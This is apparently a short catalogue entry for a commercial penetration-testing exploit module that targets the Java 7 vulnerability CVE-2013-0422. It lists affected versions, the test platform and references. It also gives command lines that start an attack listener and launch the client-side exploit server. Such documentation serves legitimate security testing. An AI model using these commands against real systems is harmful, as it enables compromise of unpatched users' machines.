Immunity, Inc.
Name java_MBeanInstantiator_findClass
CVE CVE-2013-0422
Exploit Pack CANVAS
Descriptionjava_MBeanInstantiator_findClass
NotesCVE Name: CVE-2013-0422
VENDOR: Sun
Notes:

Affected versions
JDK and JRE 7 Update 10 and earlier

Tested on:
- Windows 7 with JDK/JRE 7 update 10

To run from command line, first start the listener (UNIVERSAL):
python commandlineInterface.py -l 192.168.1.10 -p 5555 -v 17

And then run the exploit from clientd:
python ./exploits/clientd/clientd.py -l 192.168.1.10 -d 5555 -O server_port:8080 -O allowed_attack_modules:java_MBeanInstantiator_findClass -O allowed_recon_modules:js_recon -O auto_detect_exploits:0


Repeatability: Infinite (client side - no crash)
References: http://malware.dontneedcoffee.com/2013/01/0-day-17u10-spotted-in-while-disable.html
CVE Url: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-0422
Date public: 01/10/2013

Learn more about the CANVAS Exploit Pack here: CANVAS